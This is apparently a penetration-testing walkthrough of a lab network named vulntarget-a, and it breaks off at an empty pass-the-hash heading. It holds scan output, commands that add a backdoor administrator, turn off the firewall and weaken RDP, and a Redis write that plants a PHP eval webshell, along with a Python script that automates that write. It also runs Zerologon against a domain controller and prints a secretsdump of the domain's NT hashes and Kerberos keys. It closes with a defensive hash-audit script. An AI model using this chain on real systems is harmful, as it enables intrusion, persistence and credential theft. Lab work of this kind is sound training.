Nmap #
[root@Hacking] /home/kali/vulntarget-a
❯ nmap 192.168.237.132 -A
PORT STATE SERVICE VERSION
80/tcp open http nginx
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: \xCD\xA8\xB4\xEFOA\xCD\xF8\xC2\xE7\xD6\xC7\xC4\xDC\xB0\xEC\xB9\xAB\xCF\xB5\xCD\xB3
| http-robots.txt: 1 disallowed entry
|_/
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
MAC Address: 00:0C:29:99:58:97 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|phone
Running: Microsoft Windows 7|Phone
OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows
OS details: Microsoft Windows Embedded Standard 7, Microsoft Windows Phone 7.5 or 8.0
Network Distance: 1 hop
Service Info: Host: WIN7-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_nbstat: NetBIOS name: WIN7-PC, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:99:58:97 (VMware)
|_clock-skew: mean: -2h39m59s, deviation: 4h37m07s, median: 0s
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: win7-PC
| NetBIOS computer name: WIN7-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-09-04T10:23:53+08:00
| smb2-time:
| date: 2025-09-04T02:23:53
|_ start_date: 2025-09-04T02:22:36
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
TRACEROUTE
HOP RTT ADDRESS
1 0.32 ms 192.168.237.132
Two things in this scan matter for what follows: nginx on 80 sets a PHPSESSID cookie without the HttpOnly flag (the http-title is GBK text that Nmap prints escaped; it is decoded in the next section), and SMB on 445 belongs to Windows 7 SP1 with message signing enabled but not required.
Dirsearch #
[root@Hacking] /home/kali/vulntarget-a
❯ dirsearch -u 'http://192.168.237.132/'
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289
Target: http://192.168.237.132/
[10:37:07] Scanning:
[10:37:08] 400 - 166B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[10:37:11] 301 - 178B - /api -> http://192.168.237.132/api/
[10:37:11] 403 - 564B - /api/
[10:37:11] 403 - 564B - /attachment.asp
[10:37:11] 403 - 564B - /attachment.aspx
[10:37:11] 403 - 564B - /attachment.jsp
[10:37:11] 403 - 564B - /attachment.html
[10:37:11] 403 - 564B - /attachment.htm
[10:37:11] 403 - 564B - /attachmentedit.asp
[10:37:11] 403 - 564B - /attachmentedit.aspx
[10:37:11] 403 - 564B - /attachmentedit.html
[10:37:11] 403 - 564B - /attachmentedit.jsp
[10:37:11] 403 - 564B - /attachmentedit.htm
[10:37:11] 403 - 564B - /attachments
[10:37:11] 403 - 564B - /attachments.aspx
[10:37:11] 403 - 564B - /attachments.jsp
[10:37:11] 403 - 564B - /attachments.html
[10:37:11] 403 - 564B - /attachments.htm
[10:37:11] 403 - 564B - /attachments.asp
[10:37:13] 200 - 894B - /favicon.ico
[10:37:13] 301 - 178B - /general -> http://192.168.237.132/general/
[10:37:14] 301 - 178B - /images -> http://192.168.237.132/./images/
[10:37:14] 403 - 564B - /./images/
[10:37:14] 403 - 564B - /./images/Sym.php
[10:37:14] 403 - 564B - /./images/c99.php
[10:37:14] 301 - 178B - /inc -> http://192.168.237.132/inc/
[10:37:14] 403 - 564B - /inc/
[10:37:14] 200 - 10KB - /index.php
[10:37:14] 400 - 166B - /index.php::$DATA
[10:37:14] 200 - 10KB - /index.php.
[10:37:14] 200 - 10KB - /index.pHp
[10:37:15] 301 - 178B - /mobile -> http://192.168.237.132/mobile/
[10:37:16] 301 - 178B - /portal -> http://192.168.237.132/portal/
[10:37:17] 200 - 26B - /robots.txt
[10:37:17] 301 - 178B - /share -> http://192.168.237.132/share/
[10:37:17] 200 - 0B - /share/
[10:37:17] 200 - 2KB - /portal/
[10:37:18] 301 - 178B - /static -> http://192.168.237.132/static/
[10:37:18] 301 - 178B - /static.. -> http://192.168.237.132/static/
[10:37:18] 403 - 564B - /templates/beez/index.php
[10:37:18] 403 - 564B - /templates/ja-helio-farsi/index.php
[10:37:18] 403 - 564B - /templates/rhuk_milkyway/index.php
[10:37:18] 400 - 166B - /Trace.axd::$DATA
[10:37:19] 400 - 166B - /web.config::$DATA
[10:37:19] 301 - 178B - /WebService -> http://192.168.237.132/WebService/
Task Completed
From here on I changed the IPs a bit, because some tools don't work well on Kali.
Tongda OA #
Port 80 serves Tongda OA: the GBK bytes in the Nmap http-title decode to 通达OA网络智能办公系统 (Tongda OA Network Intelligent Office System), and the /general, /inc, /mobile, /portal, /static and /WebService paths found by dirsearch are its standard layout. Once commands can be run on the Windows 7 host, enable RDP, add a backdoor administrator and drop the firewall:
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
net user hack Admin@123 /add
net localgroup Administrators hack /add
netsh firewall set opmode disable
To also allow remote desktop sessions without TLS or NLA (SecurityLayer=0 selects the legacy RDP security layer and UserAuthentication=0 turns off Network Level Authentication, so older or tunnelled clients can connect; the netsh firewall context above is the legacy one Windows 7 still ships, newer builds use netsh advfirewall set allprofiles state off):
powershell -Command "Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name SecurityLayer -Value 0; Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -Name UserAuthentication -Value 0"
Redis #
After connecting over RDP, check which network segments the host sits on. The next target is 10.0.20.99, reached through the proxy (`pc -q` is the author's wrapper alias, presumably proxychains in quiet mode):
[root@Hacking] /home/kali/vulntarget-a
❯ pc -q dirsearch -u 'http://10.0.20.99/'
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, asp, aspx, jsp, html, htm | HTTP method: GET | Threads: 25 | Wordlist size: 12289
Target: http://10.0.20.99/
[11:10:04] Scanning:
[11:10:14] 200 - 11B - /index.php
[11:10:14] 200 - 11B - /index.pHp
[11:10:14] 200 - 11B - /index.php.
[11:10:14] 200 - 11B - /index.php/login/
[11:10:14] 403 - 225B - /index.php::$DATA
[11:10:16] 200 - 71KB - /phpinfo.php
[11:10:17] 200 - 14KB - /l.php
[11:10:19] 403 - 225B - /Trace.axd::$DATA
[11:10:20] 403 - 226B - /web.config::$DATA
Task Completed
phpinfo.php and l.php (the phpStudy probe page) are exposed on 10.0.20.99; DOCUMENT_ROOT in phpinfo reveals the web root, C:\phpstudy\phptutorial\www, which is the directory the Redis write below points at. Redis on 6379 accepts commands without authentication, so its RDB dump can be aimed into the web root:
[root@Hacking] /home/kali/vulntarget-a
❯ pc -q redis-cli -h 10.0.20.99 -p 6379
10.0.20.99:6379> set payload "\n<?php eval(\$_POST['cmd']);?>\n"
OK
10.0.20.99:6379> config set dir C:\phpstudy\phptutorial\www
OK
10.0.20.99:6379> config set dbfilename shell.php
OK
10.0.20.99:6379> save
OK
10.0.20.99:6379>
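The same exchange at the wire level, as an added example that is not part of the original write-up: it encodes the SET / CONFIG SET dir / CONFIG SET dbfilename / SAVE sequence as RESP, reads each reply, stops at the first error reply (which is what you get when requirepass is set or CONFIG has been renamed away) and puts dir and dbfilename back afterwards so the service keeps dumping where it used to. The FakeRedis transport is constructed so the script runs offline; `Client(socket.create_connection((host, 6379)))` drives a real instance the same way. The web root and file name are the ones from the transcript.

```python
class RedisError(Exception): pass   # server error reply: -ERR, -NOAUTH, ...
class Incomplete(Exception): pass   # buffer does not yet hold a whole RESP frame

def resp_encode(*args):
    """RESP array of bulk strings: the wire form of what redis-cli sends."""
    out = [b"*%d\r\n" % len(args)]
    for a in args:
        b = a.encode() if isinstance(a, str) else a
        out.append(b"$%d\r\n%s\r\n" % (len(b), b))
    return b"".join(out)

def resp_decode(data):
    """Decode one RESP frame from the front of data -> (value, remaining bytes)."""
    kind, (line, sep, rest) = data[:1], data[1:].partition(b"\r\n")
    if not sep:
        raise Incomplete
    if kind == b"+":
        return line.decode(), rest
    if kind == b"-":
        return RedisError(line.decode()), rest
    if kind == b"$":
        n = int(line)
        if n < 0:
            return None, rest
        if len(rest) < n + 2:
            raise Incomplete
        return rest[:n].decode(), rest[n + 2:]
    if kind == b"*":
        items = []
        for _ in range(int(line)):
            item, rest = resp_decode(rest)
            items.append(item)
        return items, rest
    raise ValueError("unsupported RESP type %r" % kind)

class Client:
    """One command at a time over anything with sendall()/recv(): a socket or FakeRedis."""
    def __init__(self, transport):
        self.t, self.buf = transport, b""
    def call(self, *args):
        self.t.sendall(resp_encode(*args))
        while True:
            try:
                reply, self.buf = resp_decode(self.buf)
                break
            except Incomplete:
                chunk = self.t.recv(4096)
                if not chunk:
                    raise ConnectionError("server closed the connection")
                self.buf += chunk
        if isinstance(reply, RedisError):
            raise reply  # -NOAUTH (requirepass set), -ERR (CONFIG renamed, dir not writable)
        return reply

def write_file_via_rdb(client, directory, filename, php):
    """Replay the transcript's SET / CONFIG SET dir / CONFIG SET dbfilename / SAVE,
    then put the old values back. Returns dir + '/' + dbfilename, as fscan reports it."""
    old_dir = client.call("CONFIG", "GET", "dir")[1]   # fails early on NOAUTH or renamed CONFIG
    old_dbf = client.call("CONFIG", "GET", "dbfilename")[1]
    for cmd in (("SET", "payload", "\n" + php + "\n"),  # newlines keep the PHP tag clear of RDB bytes
                ("CONFIG", "SET", "dir", directory),
                ("CONFIG", "SET", "dbfilename", filename),
                ("SAVE",),
                ("CONFIG", "SET", "dir", old_dir),
                ("CONFIG", "SET", "dbfilename", old_dbf)):
        client.call(*cmd)
    return directory + "/" + filename

class FakeRedis:
    """Constructed in-memory Redis stand-in so the example runs offline. SAVE just
    concatenates the stored values; a real RDB wraps them in binary."""
    def __init__(self, require_auth=False):
        self.cfg = {"dir": "/var/lib/redis", "dbfilename": "dump.rdb"}
        self.kv, self.files, self.inbuf, self.out = {}, {}, b"", b""
        self.require_auth = require_auth
    def sendall(self, data):
        self.inbuf += data
        while True:
            try:
                cmd, self.inbuf = resp_decode(self.inbuf)
            except Incomplete:
                return
            self.out += self._handle(cmd[0].upper(), cmd[1:])
    def recv(self, n):
        chunk, self.out = self.out[:n], self.out[n:]
        return chunk
    def _handle(self, name, args):
        if self.require_auth:
            return b"-NOAUTH Authentication required.\r\n"
        if name == "SET":
            self.kv[args[0]] = args[1]
        elif name == "CONFIG" and args[0].upper() == "GET":
            return resp_encode(args[1], self.cfg[args[1]])
        elif name == "CONFIG" and args[0].upper() == "SET":
            self.cfg[args[1]] = args[2]
        elif name == "SAVE":
            path = self.cfg["dir"] + "/" + self.cfg["dbfilename"]
            self.files[path] = b"REDIS0009" + "".join(self.kv.values()).encode() + b"\xff"
        else:
            return b"-ERR unknown command\r\n"
        return b"+OK\r\n"
```

The returned path uses a forward slash between the Windows directory and the file name, which is exactly how fscan later reports the dropped file. On the defensive side the same script fails at the first CONFIG GET when requirepass is set or CONFIG is renamed in redis.conf, which is the check to run against your own instances.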
With the webshell in place, command execution on the win2016 host (10.0.20.99, which also sits on 10.0.10.0/24 as 10.0.10.111) lets fscan sweep that segment:
C:\> .\fscan.exe -h 10.0.10.111/24
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
(icmp) Target 10.0.10.111 is alive
(icmp) Target 10.0.10.110 is alive
[*] Icmp alive hosts len is: 2
10.0.10.110:88 open
10.0.10.111:139 open
10.0.10.111:6379 open
10.0.10.110:445 open
10.0.10.111:445 open
10.0.10.110:139 open
10.0.10.110:135 open
10.0.10.111:135 open
10.0.10.111:80 open
[*] alive ports len is: 9
start vulscan
[*] NetInfo
[*]10.0.10.111
[->]win2016
[->]10.0.20.99
[->]10.0.10.111
[*] WebTitle http://10.0.10.111 code:200 len:11 title:None
[*] NetBios 10.0.10.110 [+] DC:VULNTARGET\WIN2019
[*] NetInfo
[*]10.0.10.110
[->]win2019
[->]10.0.10.110
[+] Redis 10.0.10.111:6379 unauthorized file:C:\phpstudy\phptutorial\www/shell.php
Completed 9/9
[*] Scan finished, elapsed: 13.054138s
As before, add a backdoor administrator and enable RDP on this host; once on it, turn off Windows Defender.
Zerologon #
Since the DC is Windows Server 2019, Zerologon (CVE-2020-1472) is worth trying (through a second-hop proxy here). The exploit resets the DC machine account password to empty, which is why secretsdump below can authenticate as WIN2019$ with -no-pass; the WIN2019$ row in the dump carries the empty-password NT hash 31d6cfe0d16ae931b73c59d7e0c089c0, confirming the reset. Leaving the DC in this state breaks its own Netlogon and replication, so restore the original machine password (recoverable from the DC's local $MACHINE.ACC LSA secret with the dumped Administrator hash) before moving on.
[root@Hacking] /home/kali/vulntarget-a/CVE-2020-1472 (master)
❯ pc -q impacket-secretsdump vulntarget/'WIN2019$'@10.0.10.110 -no-pass -just-dc
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a3dd8e4a352b346f110b587e1d1d1936:::
vulntarget.com\win2016:1601:aad3b435b51404eeaad3b435b51404ee:dfc8d2bfa540a0a6e2248a82322e654e:::
WIN2019$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN2016$:1602:aad3b435b51404eeaad3b435b51404ee:5d1755dbfbefbca94500a6614cecf3e3:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:70a1edb09dbb1b58f1644d43fa0b40623c014b690da2099f0fc3a8657f75a51d
Administrator:aes128-cts-hmac-sha1-96:04c435638a00755c0b8f12211d3e88a1
Administrator:des-cbc-md5:dcc29476a789ec9e
krbtgt:aes256-cts-hmac-sha1-96:f7a968745d4f201cbeb73f4b1ba588155cfd84ded34aaf24074a0cfe95067311
krbtgt:aes128-cts-hmac-sha1-96:f401ac35dc1c6fa19b0780312408cded
krbtgt:des-cbc-md5:10efae67c7026dbf
vulntarget.com\win2016:aes256-cts-hmac-sha1-96:e4306bef342cd8215411f9fc38a063f5801c6ea588cc2fee531342928b882d61
vulntarget.com\win2016:aes128-cts-hmac-sha1-96:6da7e9e046c4c61c3627a3276f5be855
vulntarget.com\win2016:des-cbc-md5:6e2901311c32ae58
WIN2019$:aes256-cts-hmac-sha1-96:092c877c3b20956347d535d91093bc1eb16b486b630ae2d99c0cf15da5db1390
WIN2019$:aes128-cts-hmac-sha1-96:0dca147d2a216089c185d337cf643e25
WIN2019$:des-cbc-md5:01c8894f541023bc
WIN2016$:aes256-cts-hmac-sha1-96:2c70f1e0697700c26486ccab3a4f99ab2a79b46cd49b5a280bbbeb2128578e10
WIN2016$:aes128-cts-hmac-sha1-96:7d23c054ce0fb62fb94b11acab447292
WIN2016$:des-cbc-md5:794fe6aef4dc6d97
[*] Cleaning up...
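A check I'd run on the dump before going further, as an added example that is not part of the write-up: parse the hash rows, flag any machine account whose NT hash is that of the empty password (the DC's own account in this state means the Zerologon reset has not been undone), and flag stored LM hashes and NT-hash reuse while at it. The DC hostname WIN2019 is taken from fscan's NetBios line above; the sample rows are copied from the dump above, with the Kerberos keys omitted.

```python
import re

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # "no LM hash stored" marker
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password

# domain\user:rid:lmhash:nthash:::  (secretsdump's own row format, per its banner line)
ROW = re.compile(r"^(?P<name>[^:\s]+):(?P<rid>\d+):(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$")


def parse_dump(text):
    """One dict per hash row; [*] status lines and Kerberos key lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            row = m.groupdict()
            row["rid"] = int(row["rid"])
            row["domain"], _, row["user"] = row["name"].rpartition("\\")
            rows.append(row)
    return rows


def audit(rows, dc_hostname):
    """Return (account, finding) pairs worth acting on before leaving the domain in this state."""
    findings = []
    dc_account = dc_hostname.upper() + "$"
    for r in rows:
        user = r["user"]
        if r["nt"] == EMPTY_NT:
            if user.upper() == dc_account:
                findings.append((user, "DC machine account password is empty: Zerologon reset not restored"))
            elif user.endswith("$"):
                findings.append((user, "machine account with empty password"))
            elif user.lower() != "guest":  # Guest is disabled with an empty password by default
                findings.append((user, "user account with empty password"))
        if r["lm"] != EMPTY_LM:
            findings.append((user, "LM hash stored: LM hashing not disabled"))
    by_nt = {}
    for r in rows:
        if r["nt"] != EMPTY_NT:
            by_nt.setdefault(r["nt"], []).append(r["user"])
    for users in by_nt.values():
        if len(users) > 1:
            findings.append((", ".join(users), "same NT hash: password reuse across accounts"))
    return findings


# Hash rows copied from the dump above (Kerberos keys omitted)
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c7c654da31ce51cbeecfef99e637be15:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a3dd8e4a352b346f110b587e1d1d1936:::
vulntarget.com\\win2016:1601:aad3b435b51404eeaad3b435b51404ee:dfc8d2bfa540a0a6e2248a82322e654e:::
WIN2019$:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN2016$:1602:aad3b435b51404eeaad3b435b51404ee:5d1755dbfbefbca94500a6614cecf3e3:::
"""


def report(text, dc_hostname):
    """Parse a secretsdump transcript and audit it in one call."""
    return audit(parse_dump(text), dc_hostname)


if __name__ == "__main__":
    for account, finding in report(SAMPLE_DUMP, "WIN2019"):
        print(f"{account}: {finding}")
```

Run against the dump above it reports exactly one finding, the empty WIN2019$ password; the krbtgt and Administrator hashes are the material the next section (PTH) builds on and are out of scope for this check.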
PTH #